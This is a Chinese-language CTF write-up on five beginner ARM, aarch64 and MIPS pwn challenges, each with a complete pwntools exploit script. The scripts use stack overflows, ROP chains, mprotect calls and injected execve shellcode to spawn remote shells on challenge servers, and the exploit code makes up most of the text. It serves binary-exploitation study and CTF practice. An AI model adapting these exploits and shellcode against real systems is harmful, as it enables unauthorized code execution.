前言:
记录一下最近做的几道异构入门题
jarvisoj_typo:
32位arm,静态链接,本地测出偏移后rop即可
注意的是因为去掉了符号表,所以 system 函数可能需要找一会儿,可以使用 xref 找
exp:
# jarvisoj_typo: stack-overflow -> ROP on a statically linked 32-bit ARM binary.
# All addresses below are absolute, so the script assumes the binary maps at a
# fixed base; a stack canary or PIE would invalidate both the fixed offset and
# the hard-coded gadget/function addresses.
from pwn import *
import sys
remote_addr = ["node4.buuoj.cn",27348]
#libc = ELF('')
#elf = ELF('')
# Local run (no argv): qemu-user with a gdb stub listening on port 1234.
if len(sys.argv) == 1:
    # context.log_level="debug"
    #io = process(["qemu-aarch64", "-L", "/usr/aarch64-linux-gnu/", "-g","1234","./stack"])
    # io = process(["qemu-aarch64", "-L", ".", "./stack"])
    io = process(["qemu-arm-static", "-g", "1234", "./typo"])
    # io = process("")
    context(arch='arm', os='linux',bits='32')
    # context.terminal['tmux', 'splitw', '-h']
# Remote run: an argv[1] containing 'r' selects the remote target; a missing 'n'
# turns on debug logging.
if len(sys.argv) == 2 :
    if 'r' in sys.argv[1]:
        io = remote(remote_addr[0],remote_addr[1])
    if 'n' not in sys.argv[1]:
        context.log_level="debug"
#context(arch = 'amd64', os = 'linux')
# NOTE(review): context is only configured on the local path.  This script never
# calls asm(), and p32()/cyclic() default to little-endian, so the remote path
# still packs correctly.
str_sh=0x6c384      # presumably a "/bin/sh"-style string inside the binary (write-up: found via xref)
sys_addr=0x110b4    # system() -- symbols are stripped, located via xref per the write-up
payload=cyclic(0x200)   # leftover from measuring the offset locally; overwritten below
io.sendafter(b"t\n",b"\n")
# io.send(payload)
#offset 112
#0x00020904: pop {r0, r4, pc};
# 112 bytes of padding reach the saved return address.  The pop gadget loads r0
# (the first argument) with str_sh, r4 with a filler copy of it, and pc with
# system().
payload=cyclic(112)+p32(0x20904)+p32(str_sh)*2+p32(sys_addr)
io.sendafter(b"\n",payload)
io.interactive()
shanghai2018_babyarm:
aarch64,动态链接,开启了 NX,但存在 mprotect 函数,可以借此开出 rwx 段写入 shellcode
注意一下老生常谈的布栈问题
exp:
# shanghai2018_babyarm: aarch64, dynamically linked, NX enabled.  NX alone does
# not stop this one because the binary imports mprotect(): the ROP chain below
# (two passes through the csu gadgets, judging by the csu_1/csu_2 names) calls
# mprotect with attacker-controlled arguments and then returns into shellcode
# stored in the "Name" buffer.  From a hardening standpoint the whole bypass
# hinges on mprotect being reachable with controlled arguments.
from pwn import *
import sys
remote_addr = ["node4.buuoj.cn",25721]
#libc = ELF('')
elf = ELF('./pwn')
# Local run (no argv): qemu-user with a gdb stub listening on port 1234.
if len(sys.argv) == 1:
    # context.log_level="debug"
    #io = process(["qemu-aarch64", "-L", "/usr/aarch64-linux-gnu/", "-g","1234","./stack"])
    # io = process(["qemu-aarch64", "-L", ".", "./stack"])
    io = process(["qemu-aarch64-static", "-g", "1234", "./pwn"])
    # io = process("")
    context(arch='aarch64', os='linux')
    # context.terminal['tmux', 'splitw', '-h']
# Remote run: an argv[1] containing 'r' selects the remote target; a missing 'n'
# turns on debug logging.
if len(sys.argv) == 2 :
    if 'r' in sys.argv[1]:
        io = remote(remote_addr[0],remote_addr[1])
    if 'n' not in sys.argv[1]:
        context.log_level="debug"
# Set unconditionally so asm()/shellcraft below target aarch64 on every path.
context(arch='aarch64', os='linux')
#context(arch = 'amd64', os = 'linux')
# csu_2: register-restoring epilogue.  Each pass pops X19/X20, X21/X22, X23/X24
# and X29/X30 from a 0x40-byte stack frame and returns to X30.
csu_2=0x4008CC
# LDP X19, X20, [SP,#var_s10]
# LDP X21, X22, [SP,#var_s20]
# LDP X23, X24, [SP,#var_s30]
# LDP X29, X30, [SP+var_s0],#0x40
# RET
# RET jumps to the address held in X30; X30 holds the return address.
# csu_1: call loop.  X3 is loaded from memory and called with W0/X1/X2 taken
# from X24/X23/X22.
csu_1=0x4008ac
# LDR X3, [X21,X19,LSL#3]   with X19 forced to 0, X3 is loaded from the address held in X21
# MOV X2, X22
# MOV X1, X23
# MOV W0, W24
# ADD X19, X19, #1
# BLR X3
# CMP X19, X20
# B.NE loc_4008AC
# PLT stub of mprotect; its address is written to tar_addr (first 8 bytes of the
# "Name" input) so the LDR in csu_1 picks it up as X3.
# NOTE(review): pwntools keys ELF.plt by str on Python 3 -- confirm the bytes
# key resolves on the pwntools version in use.
mprotect=elf.plt[b"mprotect"]
# Disassembly of the binary's own mprotect-calling function, kept for reference.
# STP X29, X30, [SP,#-0x10+var_s0]!
# MOV X29, SP
# MOV W2, #0 ; prot
# MOV X1, #0x1000 ; len
# MOV X0, #off_411000 ; addr
# BL .mprotect
# NOP
# LDP X29, X30, [SP+var_s0],#0x10
# RET
# Writable address where the "Name" input presumably lands: mprotect's PLT
# address first, shellcode from tar_addr+8 onward.
tar_addr=0x411068
io.sendafter(b"Name:",p64(mprotect)+asm(shellcraft.sh()))
# payload=cyclic(0x48)+asm(shellcraft.sh())
# 0x48 bytes of padding reach the saved return address; the rest of the payload
# is the stack frame consumed by the first csu_2 pass (see the per-line notes).
payload=cyclic(0x48)+p64(csu_2)
payload+=p64(0)+p64(csu_1) # X19->0 X30->csu_1
payload+=p64(0)+p64(1) # X19->0 X20->1
payload+=p64(tar_addr)+p64(7)+p64(0x1000)+p64(tar_addr+8) # X3->X21->tar_addr X2->X22->7 X1->X23->0x1000 W0->W24(X24)->tar_addr+0x8
# After BLR X3 returns, X19 == X20 ends the csu_1 loop and the epilogue runs a
# second time, this time returning into the shellcode at tar_addr+8.
payload+=p64(0)+p64(tar_addr+0x8) # mprotect X29->0 X30->tar_addr+0x8
io.sendline(payload)
io.interactive()
axb_2019_mips:
该 mips 题关闭了 NX,可以构造 read 将 shellcode 读入 bss 段,然后跳转到 bss 段执行
# axb_2019_mips: little-endian MIPS, NX disabled.  Because the data pages are
# executable, the chain only needs to redirect read() into .bss and then jump
# there; with NX on, this approach would not work as written.
from pwn import *
import sys
remote_addr = ["node4.buuoj.cn",27635]
#libc = ELF('')
#elf = ELF('')
# Local run (no argv): qemu-user with a gdb stub on port 1234 and "." as sysroot.
if len(sys.argv) == 1:
    # context.log_level="debug"
    #io = process(["qemu-aarch64", "-L", "/usr/aarch64-linux-gnu/", "-g","1234","./stack"])
    # io = process(["qemu-aarch64", "-L", ".", "./stack"])
    io = process(["qemu-mipsel-static", "-g", "1234","-L",".","./pwn2"])
    # io = process("")
    context(arch='mips',endian='little', os='linux',bits='32')
    # context.terminal['tmux', 'splitw', '-h']
# Remote run: an argv[1] containing 'r' selects the remote target; a missing 'n'
# turns on debug logging.
if len(sys.argv) == 2 :
    if 'r' in sys.argv[1]:
        # asm()/p32() below depend on this; it is set on both the local and remote paths.
        context(arch='mips',endian='little', os='linux',bits='32')
        io = remote(remote_addr[0],remote_addr[1])
    if 'n' not in sys.argv[1]:
        context.log_level="debug"
#context(arch = 'amd64', os = 'linux')
# NOTE(review): an argv[1] without 'r' (e.g. just "n") leaves context unset and
# io undefined; only "no argv" and "r..." are supported invocations.
shellcode=asm(shellcraft.sh())
bss_addr=0x410c00     # writable (and, with NX off, executable) .bss address
read_text=0x4007e0    # code address that reaches read() again (per the write-up)
io.sendafter(b"name: \n",b"aaa")
# payload=cyclic(0x200)
#offset 36
# # NOP sled (XOR $t0, $t0, $t0; as NOP is only null bytes)
# for i in range(29):
# payload += b"\x26\x40\x08\x01"
# First overflow: 0x20 bytes of padding, bss_addr in the slot before the saved
# return address (offset 36), then return into read_text.
payload=cyclic(0x20)+p32(bss_addr)+p32(read_text)
io.sendafter(b"aaa",payload)
# Presumably gives the emulated process time to consume the first payload before
# the second send.
sleep(1)
# Second overflow: return to bss_addr+0x40, which should land inside the xor
# sled ahead of the shellcode (see the write-up for the stack/bss layout).
payload=cyclic(0x24)+p32(bss_addr+0x40)+b"\x26\x40\x08\x01"*20+shellcode
io.send(payload)
io.interactive()
ycb_2020_mipspwn:
mipsel,打法同上,向bss段写入shellcode跳转执行
此题需要限制一下shellcode长度,使用shellcraft生成的过长了
可以到 exploit-db 上找:https://www.exploit-db.com/shellcodes/13300
exp:
# ycb_2020_mipspwn: little-endian MIPS, same technique as axb_2019_mips (read
# shellcode into .bss, then return into it).  The shellcraft output was too long
# for the input size, so a shorter blob from the exploit-db reference in the
# write-up is used instead.
from pwn import *
import sys
remote_addr = ["node4.buuoj.cn",26964]
#libc = ELF('')
#elf = ELF('')
# Local run (no argv): qemu-user with a gdb stub listening on port 1234.
if len(sys.argv) == 1:
    # context.log_level="debug"
    #io = process(["qemu-aarch64", "-L", "/usr/aarch64-linux-gnu/", "-g","1234","./stack"])
    # io = process(["qemu-aarch64", "-L", ".", "./stack"])
    # io = process(["qemu-mipsel-static", "-g", "1234","-L",".","./pwn2"])
    io = process(["qemu-mipsel-static", "-g", "1234","./pwn2"])
    # io = process("")
    context(log_level='debug',arch='mips',endian='little', os='linux',bits='32')
    # context.terminal['tmux', 'splitw', '-h']
# Remote run: an argv[1] containing 'r' selects the remote target; a missing 'n'
# turns on debug logging.
if len(sys.argv) == 2 :
    if 'r' in sys.argv[1]:
        # p32() below depends on the endianness set here.
        context(arch='mips',endian='little', os='linux',bits='32')
        io = remote(remote_addr[0],remote_addr[1])
    if 'n' not in sys.argv[1]:
        context.log_level="debug"
#context(arch = 'amd64', os = 'linux')
bss_addr=0x411700     # writable .bss address the shellcode is read into
read_text=0x400f50    # code address that reaches read() again (per the write-up)
io.sendafter(b"here:\n",b"aaa")
io.recv()
io.sendline(b"7")     # presumably a menu choice; see the challenge's prompt
#payload=cyclic(0x200)
#offset 60
# First overflow: 56 bytes of padding, bss_addr in the slot before the saved
# return address (offset 60), then return into read_text.
payload=cyclic(56)+p32(bss_addr)+p32(read_text)
io.sendafter(b"feeling:\n",payload)
# Opaque shellcode blob taken from the exploit-db entry linked in the write-up;
# not disassembled here.
shellcode=b"\xff\xff\x10\x04\xab\x0f\x02\x24"
shellcode+=b"\x55\xf0\x46\x20\x66\x06\xff\x23"
shellcode+=b"\xc2\xf9\xec\x23\x66\x06\xbd\x23"
shellcode+=b"\x9a\xf9\xac\xaf\x9e\xf9\xa6\xaf"
shellcode+=b"\x9a\xf9\xbd\x23\x21\x20\x80\x01"
shellcode+=b"\x21\x28\xa0\x03\xcc\xcd\x44\x03"
shellcode+=b"/bin/sh"
# Second overflow: 60 bytes of padding, then return to bss_addr+88, which should
# point at the shellcode once this input has been read into .bss (layout per the
# write-up -- TODO confirm the +88 against the actual read destination).
payload=b"a"*60+p32(bss_addr+88)+shellcode
io.send(payload)
io.interactive()
hkcert2023_rop:
mips,构造gets往可写段上写shellcode,再找gadget跳过去,最后溢出跳转
# hkcert2023_rop: big-endian MIPS.  The first overflow pivots through a
# register-restoring gadget into gets(), which writes shellcode to a writable
# address; the second input (consumed by gets) ends with a return into that
# address.  The hard-coded addresses assume a non-PIE mapping and a writable,
# executable destination page.
from pwn import *
import sys
remote_addr = ["chal.hkcert23.pwnable.hk",28151]
#libc = ELF('')
#elf = ELF('')
# Local run (no argv): qemu-user with a gdb stub on port 1234 and "." as sysroot.
if len(sys.argv) == 1:
    context.log_level="debug"
    p = process(["qemu-mips-static", "-L", ".", "-g","1234","./rop"])
    # NOTE(review): `elf` is only defined on this path and is never used below.
    elf=ELF("./rop")
    # p = process(["qemu-mips-static", "-L", ".", "./rop"])
    # p = process("./rop")
    context(arch='mips',endian='big',bits='32',os='linux')
    context.terminal = ['tmux', 'splitw', '-h']
# Remote run: an argv[1] containing 'r' selects the remote target; a missing 'n'
# turns on debug logging.
if len(sys.argv) == 2 :
    if 'r' in sys.argv[1]:
        # asm()/p32()/flat() below depend on the big-endian MIPS context.
        context(arch='mips',endian='big',bits='32',os='linux')
        p = remote(remote_addr[0],remote_addr[1])
    if 'n' not in sys.argv[1]:
        context.log_level="debug"
#context(arch = 'amd64', os = 'linux')
# gdb.attach(p)
# pause()
# Big-endian xor $t0,$t0,$t0 usable as a NOP; unused in this script.
nop=b"\x01\x08\x40\x26"
# Builds "//bin/sh\0" on the stack (the two 32-bit constants spell the string),
# points $a0 at it, sets $a1/$a2 to 0 via slti (no null bytes in the encoding),
# and issues syscall 4011 (execve on MIPS o32).  The syscall code field is
# normally ignored by the kernel.
shellcode = asm('''
lui $t7, 0x2f2f
ori $t7, $t7,0x6269
lui $t6, 0x6e2f
ori $t6, $t6, 0x7368
sw $t7, -12($sp)
sw $t6, -8($sp)
sw $zero, -4($sp)
addiu $a0, $sp, -12
slti $a1, $zero, -1
slti $a2, $zero, -1
li $v0, 4011
syscall 0x040405
''')
# Ghidra listing of the gadget at 0x456c34: reloads ra, v0 and s0..s3 from the
# stack, then jr ra.  The stack offsets in the second column of each pair
# (0x5c -> ra, 0x24 -> v0, 0x4c -> s0) are the keys used in flat() below.
# LAB_00456c34 XREF[1]: 00456c20(j)
# 00456c34 8f bf lw ra,local_4(sp)
# 00 5c
# 00456c38 8f a2 lw v0,local_3c(sp)
# 00 24
# 00456c3c 8f b3 lw s3,local_8(sp)
# 00 58
# 00456c40 8f b2 lw s2,local_c(sp)
# 00 54
# 00456c44 8f b1 lw s1,local_10(sp)
# 00 50
# 00456c48 8f b0 lw s0,local_14(sp)
# 00 4c
# 00456c4c 03 e0 jr ra
# 00 08
gets_text=0x400820    # code address that calls gets() (per the write-up)
# Frame consumed by the gadget: v0 <- 0x49cc20 (the writable destination),
# s0 <- 0, ra <- gets_text.  flat() zero-pads between the given offsets.
payload=flat(
    {
        0x24:p32(0x49cc20),
        0x4c:p32(0),
        0x5c:p32(gets_text),
    }
)
# First input: 72 bytes of padding, 0x49cc20 in the slot before the saved return
# address, return into the gadget, then the gadget's frame built above.
p.sendlineafter(b"input : \n",b"a"*72+p32(0x49cc20)+p32(0x456c34)+payload)
# Second input (read by gets): shellcode at the start of 0x49cc20, padding to
# 0x64 bytes, then a final return address pointing back at the shellcode.
p.sendline(shellcode+cyclic(0x64-len(shellcode))+p32(0x49cc20))
p.interactive()